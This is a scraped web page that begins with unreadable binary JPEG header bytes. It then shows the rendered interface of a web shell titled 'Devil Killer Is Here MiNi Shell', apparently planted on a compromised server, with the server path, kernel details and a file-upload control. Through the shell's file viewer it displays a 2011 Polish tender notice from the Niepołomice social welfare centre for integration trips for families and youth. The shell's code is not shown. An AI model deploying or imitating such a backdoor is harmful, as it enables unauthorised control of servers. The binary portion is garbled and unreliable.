JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/138188-N-2011.html

<p class="kh_header"><b>Niepołomice: postępowanie o udzielenie zamówienia publicznego na zorganizowanie wyjazdu integracyjno-szkoleniowego dla osób dorosłych wraz z ich dziećmi oraz wyjazdu edukacyjno-integracyjnego dla  młodzieży, znak sprawy: MGOPS.271.1.2011</b><br>
<b>Numer ogłoszenia: 138188 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Piękna 1, 32-005 Niepołomice, woj. małopolskie, tel. 12 28 11 172, faks 12 28 11 259.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mgops-niepolomice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego na zorganizowanie wyjazdu integracyjno-szkoleniowego dla osób dorosłych wraz z ich dziećmi oraz wyjazdu edukacyjno-integracyjnego dla  młodzieży, znak sprawy: MGOPS.271.1.2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja wyjazdu integracyjno-szkoleniowego dla 7 osób dorosłych wraz z ich dziećmi oraz wyjazdu edukacyjno-integracyjnego dla 15-osobowej grupy młodzieży - uczestników projektu pn. Żyjemy obok siebie, zacznijmy żyć razem - realizowanego przez Miejsko - Gminny Ośrodek Pomocy Społecznej w Niepołomicach współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji.
2. Zakres zamówienia obejmuje dwa zadania (dwie części):
a) Zadanie nr I -Zorganizowanie wyjazdu integracyjno-szkoleniowego osób dorosłych wraz z ich dziećmi,
b) Zadanie nr II -Zorganizowanie wyjazdu edukacyjno-integracyjnego dla młodzieży..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek określony w punkcie VIII.2b SIWZ, został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie wykonanych usług, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej jedno szkolenie wyjazdowe o zakresie tematycznym wskazanym w przedmiocie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek o którym mowa w punkcie VIII.2c SIWZ został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie osób, które będą uczestniczyć w wykonaniu zamówienia, że dysponuje lub będzie dysponował:
Zadanie nr I - trzema osobami uczestniczącymi w wykonaniu zamówienia, z których jedna osoba (trener/ka prowadzący zajęcia) posiada wykształcenie wyższe, co najmniej roczne doświadczenie zawodowe w charakterze wykładowcy specjalizującego się w zagadnieniach określonych 
w przedmiocie zamówienia (zał. nr 1a do SIWZ) oraz dwoma osobami (opiekunkami dzieci), które posiadają co najmniej roczne doświadczenie w sprawowaniu opieki nad osobami nieletnimi potwierdzone stosownymi dokumentami (np. referencjami) w ilości co najmniej 2 referencji,
Zadanie nr II - minimum jedną osobą (trener/ka prowadzącą zajęcia), która posiada wykształcenie wyższe, co najmniej roczne doświadczenie zawodowe w charakterze wykładowcy specjalizującego się w zagadnieniach określonych w przedmiocie zamówienia (zał. nr 1b do SIWZ) oraz dwoma osobami (opiekunowie młodzieży), które posiadają uprawnienia wychowawcy-opiekuna na koloniach, obozach młodzieżowych organizowanych w Polsce i za granicą. Jeśli Wykonawca dysponuje osobą, która spełnia oba kryteria kwalifikacji, to możliwe jest łączenie funkcji 
(tj. jednoczesne pełnienie funkcji trenera/ka i opiekuna młodzieży w jednej osobie)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy zał. nr 2a lub 2b (w zależności od części zamówienia)
2. Szczegółowy program wyjazdu oraz szkolenia opracowany na podstawie wytycznych zawartych w zał. nr 1a lub nr 1b (w zależności od części zamówienia)
3. Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w punkcie VIII.2c, Wykonawca wskazał osoby, którymi będzie dysponował. Dotyczy to sytuacji, w której Wykonawca polegać będzie na osobach zdolnych do wykonania zamówienia innych podmiotów.
4. Pełnomocnictwo dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania Wykonawcy w postępowaniu przetargowym, w tym podpisywania dokumentów przetargowych.
5. Formularz dotyczący podwykonawców z określeniem ich udziału w wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wiedza i doświadczenie Wykonawcy - 20</li>
<li>3 - Wiedza i doświadczenie Trenerów - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą zmniejszenia liczby uczestników wyjazdów z przyczyn niezależnych od Zamawiającego, ograniczenia zakresu przedmiotu zamówienia, w szczególności w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej jej akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgops-niepolomice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Niepołomicach, ul. Piękna 1, 32-005 Niepołomice, godziny urzędowania: 7.00 - 15.00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2011 godzina 12:00, miejsce: Miejsko-Gminny Ośrodek Pomocy Społecznej w Niepołomicach, ul. Piękna 1, 32-005 Niepołomice, pokój nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego, realizowany w ramach Poddziałania 7.1.1 Programu Operacyjnego kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr I - Zorganizowanie wyjazdu integracyjno-szkoleniowego dla osób dorosłych wraz z ich dziećmi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi zorganizowanie wyjazdu integracyjno-szkoleniowego wraz z zakwaterowaniem i wyżywieniem (5 dni pobytowych) dla 7 osób (4 kobiety i 3 mężczyzn) - uczestników projektu oraz osób zależnych (10 dzieci uczestników), łącznie 17 uczestników 	wyjazdu.
I. Termin realizacji.
Wykonawca zrealizuje zamówienie w wymiarze 5 dni pobytowych, tj. 4 noclegi w okresie nie wcześniej niż od dnia 05.07.2011 (wyjazd) i nie później niż do dnia 30.07.2011 (powrót). 
II. Zakres zamówienia. 
W ramach zamówienia wykonawca zapewnia wszystkim uczestnikom wyjazdu:
1. Transport zbiorowy (autokar, mikrobus itp.) wszystkich uczestników z Niepołomic do miejscowości w której położony jest ośrodek oraz przywóz uczestników z ośrodka do Niepołomic po zakończeniu wyjazdu integracyjno - szkoleniowego, biorąc pod uwagę również wiek dzieci oraz sposób ich transportu.
2. Ubezpieczenie NNW dla każdego uczestnika wyjazdu obejmujące przejazd w obie strony, pobyt na miejscu oraz  pomoc medyczną w razie potrzeby.
3. Zakwaterowanie w wymiarze 4 dób hotelowych. Miejscem zakwaterowania ma być ośrodek lub gospodarstwo agroturystyczne itp. położony w odległości drogowej nie mniejszej niż 90 km i nie większej niż 160 km od siedziby Zamawiającego, dysponujący pokojami 1, 2, 3 i 4 osobowymi, salą umożliwiającą przeprowadzenie zajęć oraz osobną salą umożliwiającą sprawowanie opieki nad dziećmi uczestników. Każdy pokój z pełnym węzłem sanitarnym tj. umywalka, prysznic, wc. Pożądane jest, aby zakwaterowanie wszystkich uczestników odbyło się w jednym budynku. Jeżeli ośrodek nie dysponuje własnym pełnym zapleczem, należy zapewnić uczestnikom wyjazdu integracyjno - szkoleniowego możliwość korzystania z takiego zaplecza poza ośrodkiem, w pobliskiej lokalizacji zapewniając jednocześnie transport do takiego zaplecza podpisując stosowną umowę z podmiotem udostępniającym takie zaplecze.
4. Pełne wyżywienie w stołówce położonej na terenie ośrodka. Wykonawca zapewnia odpowiednią ilość posiłków w zależności od pory dnia:
śniadanie - do wyboru minimum 2 pozycje z menu lub szwedzki stół,
obiad - składający się z dwóch dań (np. zupa, drugie danie), do wyboru minimum 2 pozycje z menu, deser,
kolacja - do wyboru minimum 2 pozycje z menu lub szwedzki stół.
Dodatkowo wykonawca zapewnia każdego dnia wolny dostęp do napojów (woda mineralna, soki 	lub kompoty, herbata i kawa).
5. Warunki zakwaterowania uczestników. Wykonawca zapewnia zakwaterowanie wszystkich uczestników wyjazdu wg specyfikacji:
1 pokój dwuosobowy dla 2 mężczyzn, uczestników projektu. W przypadku braku dysponowania takim pokojem wykonawca zapewnia 2 jednoosobowe pokoje po jednym dla każdego mężczyzny.
2 pokoje dwuosobowe - po jednym dla 1) matki z córką (9 lat), 2) ojca z córką (13 lat),
1 pokój trzyosobowy dla matki z 1 córką (14 lat) i 1 synem (12 lat),
1 pokój czteroosobowy dla matki z 3 synami (11, 12, 14 lat)
1 pokój 4 osobowy dla matki z 2 córkami (1 rok i 11 miesięcy,  6 lat ) i 1 synem (4 lata )

6. W trakcie wyjazdu integracyjno-szkoleniowego wykonawca zorganizuje warsztaty grupowe kompetencji i umiejętności społecznych dla 7 osób (uczestnicy projektu) w łącznym wymiarze 30 h (godzin dydaktycznych, przyjmuje się, że 1 h = 45 min). Celem warsztatów będzie dostarczenie uczestnikom wiedzy na temat komunikacji interpersonalnej, autoprezentacji, asertywności, aktualnego poziomu wybranych kompetencji społecznych oraz podniesienie gotowości do zmian w życiu poprzez wzmocnienie poczucia pewności siebie i motywowanie do wprowadzenia planów w życie.  Warsztaty podzielone są na trzy bloki tematyczne tj.
- Warsztaty kompetencji społecznych - 10 godzin dydaktycznych,
- Warsztaty aktywizacji społecznej - 10 godzin dydaktycznych,
- Warsztaty wizażu, profilaktyki chorób i zdrowego stylu życia - 10 godzin dydaktycznych.
Sala szkoleniowa powinna znajdować się na terenie ośrodka (miejsce zakwaterowania), powinna być wyposażona w sposób umożliwiający realizację pełnego wymiaru merytorycznego warsztatów dla 7 osób.
	W ramach warsztatów Wykonawca zobowiązany jest zapewnić materiały szkoleniowe, dydaktyczne i papiernicze do wykorzystania podczas zajęć i oddać je uczestnikom na własność. W skład 	kompletu szkoleniowego przekazanego uczestnikom wchodzić powinien co najmniej 1) szczegółowy program dydaktyczny warsztatów, 2) program dydaktyczny ćwiczeń realizowanych podczas zajęć, 3) zeszyt lub notatnik do samodzielnego zapisywania przez uczestnika, 
	4) długopis lub cienkopis.
Zajęcia prowadzone będą przez min. 1 specjalistę, którego zapewnia wykonawca i który 	spełnia wymagania opisane w pkt VIII.1.2.c SIWZ. Podczas odbywania warsztatów przez uczestników Wykonawca zapewnia opiekę nad dziećmi uczestników zgodnie z opisem ujętym w punkcie 11 niniejszego załącznika.
	Każdy z uczestników zajęć otrzymuje zaświadczenie potwierdzające ukończenie warsztatów, które będzie zawierało obowiązkowe logotypy i informacje o dofinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz wykaz tematów z liczbą zrealizowanych godzin i opis nabytych umiejętności.
	Dokumentacja realizowanych warsztatów obejmuje:
dzienniki prowadzonych zajęć (kserokopia potwierdzona przez Wykonawcę za zgodność z oryginałem)
listy obecności uczestników na zajęciach z datą i tematem warsztatów, liczbą godzin zrealizowanych warsztatów wraz z podpisem osoby prowadzącej zajęcia oraz własnoręcznymi podpisami uczestników warsztatów (oryginały) 
listę potwierdzającą odbiór przez uczestników materiałów szkoleniowych wraz 
z własnoręcznymi podpisami uczestników (oryginał). Zamawiający otrzymuje ponadto jeden egzemplarz kompletu szkoleniowego, które otrzymali uczestnicy.
listę potwierdzającą odbiór zaświadczenia ukończenia warsztatów przez każdego uczestnika (oryginał)
zaświadczenia ukończenia warsztatów (kserokopia zaświadczenia przekazanego każdemu uczestnikowi wraz z potwierdzeniem przez Wykonawcę zgodności kopii z oryginałem).
Wykonawca zobowiązuje się do zapoznania z Wytycznymi dotyczącymi oznaczania 	projektów w ramach Programu Operacyjnego Kapitał Ludzki, wersja z 4 lutego 2009 r. lub  nowsza oraz do stosowania przedmiotowych wytycznych w zakresie objętym zamówieniem. Zamawiający najpóźniej w dniu rozpoczęcia wyjazdu uczestników przekazuje Wykonawcy 5 szt. plakatów 	informacyjnych projektu Żyjemy obok siebie, zacznijmy żyć razem, które Wykonawca umieści w miejscu realizacji zamówienia.
7. Wykonawca wykona minimum 10 zdjęć (w formacie cyfrowym na płycie CD lub przekazanej drogą e-mail) dokumentujących realizację zamówienia wraz z przekazaniem praw autorskich do wykorzystania przez Zamawiającego w druku i w wersji elektronicznej.
8. Wykonawca obowiązany jest wyznaczyć osobę, która będzie pełniła funkcję kierownika wyjazdu integracyjno-szkoleniowego.
9. Wykonawca niezwłocznie zawiadomi Zamawiającego o każdym przypadku przerwania wyjazdu integracyjno-szkoleniowego przez jego uczestnika.
10. Wykonawca zapewni kadrę gwarantującą prawidłową organizację wyjazdu integracyjno - szkoleniowego.
11. Wykonawca zapewni opłacenie opłaty klimatycznej za wszystkich uczestników wyjazdu integracyjno - szkoleniowego, jeśli jest to wymagane.
12. Wykonawca zapewni dwuosobową kadrę gwarantującą prawidłową organizację opieki nad dziećmi uczestników w trakcie odbywania warsztatów przez uczestników (rodziców). Kadra sprawująca opiekę powinna spełniać wymogi ujęte w pkt VIII.1.2.c SIWZ. Wykonawca zapewni zajęcia edukacyjne i sportowo-rekreacyjne dla dzieci uczestników uwzględniając ich wiek, płeć, poziom wykształcenia i indywidualne preferencje. 


CHARAKTERYSTYKA OSÓB ZALEŻNYCH
Opiekun (rodzic)
Informacje o osobach zależnych (dzieci)
Uczestniczka nr 1 (kobieta)
3 synowie w wieku 11, 12, 14 lat
Uczestniczka numer 2 (kobieta)
1 córka w wieku 9 lat
Uczestniczka numer 3 (kobieta)
1 córka w wieku 14 lat
1 syn w wieku 12 lat
Uczestniczka numer 4 (kobieta)
2 córki w wieku 1 rok i 11 miesięcy,  6 lat
1 syn w wieku 4 lata
Uczestnik numer 5 (mężczyzna)
1 córka w wieku 13 lat

Łączna liczba osób zależnych (dzieci)
10 osób (5 chłopców, 5 dziewczynek)

13. Wykonawca zapewni nieodpłatnie uczestnikom wyjazdu integracyjno-szkoleniowego program integracyjny w tym co najmniej:
wieczorek zapoznawczy zawierający poczęstunek (w pierwszy dzień pobytu w trakcie lub po kolacji), zajęcia zapoznawcze -integracyjne umożliwiające wszystkim uczestnikom zapoznanie się ze sobą nawzajem, zapoznanie się z programem i warunkami pobytu, integrację w grupie.
grill (lub ognisko) w wybrany dzień pobytu (zastępujący jedną kolację), podczas którego przygotowany będzie poczęstunek i zapewnione napoje wyłącznie bezalkoholowe. 
W przypadku warunków atmosferycznych uniemożliwiających organizację tego typu imprezy Wykonawca zapewni analogiczną imprezę w pomieszczeniu zamkniętym (np. wieczór z muzyką i poczęstunkiem oraz programem rekreacyjnym).
Oprócz programu zorganizowanego Wykonawca zapewnia uczestnikom możliwość 	samodzielnych wycieczek pieszych po okolicy, możliwość podjęcia aktywności rekreacyjno-sportowej (np. sprzęt 	sportowy typu rakietki do badmintona, stół i rakiety do tenisa 	stołowego, 	piłki do gier zespołowych).
14. Zakwaterowanie oraz wszelkie koszty związane z realizacją usług przez prowadzących ponosi Wykonawca.
15. Zamawiający zastrzega sobie prawo do zmiany liczby uczestników w sytuacjach niezależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy np. choroba uczestnika. O zaistniałej sytuacji Zamawiający niezwłocznie powiadomi Wykonawcę.
16. Wszelkie rozliczenia końcowe między Zamawiającym a Wykonawcą zrealizowanych usług 
a w szczególności rozliczenia w sytuacjach powodujących zmianę liczby uczestników dokonane zostaną na podstawie cen jednostkowych określonych w formularzu ofertowym przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wiedza i doświadczenie Wykonawcy - 20</li>
<li>3. Wiedza i doświadczenie Trenerów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr II - Zorganizowanie wyjazdu edukacyjno-integracyjnego dla młodzieży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi zorganizowanie wyjazdu edukacyjno-integracyjnego wraz z zakwaterowaniem i wyżywieniem (7 dni pobytowych) dla 15 osób ( 7 kobiet i  8 mężczyzn), młodzież w wieku 15-17 lat - uczestników Programu Aktywności Lokalnej.
I. Termin realizacji.
Wykonawca zrealizuje zamówienie w wymiarze 7 dni pobytowych, tj. 6 noclegów w okresie nie 	wcześniej niż od dnia 01.08.2011 (wyjazd) i nie później niż do dnia 21.08.2011 (powrót). 
II. Zakres zamówienia. 
W ramach zamówienia wykonawca zapewnia wszystkim uczestnikom wyjazdu:
1. Transport zbiorowy (autokar, mikrobus itp.) wszystkich uczestników z Niepołomic do miejscowości w której położony jest ośrodek oraz przywóz uczestników z ośrodka do Niepołomic po zakończeniu wyjazdu edukacyjno-integracyjnego.
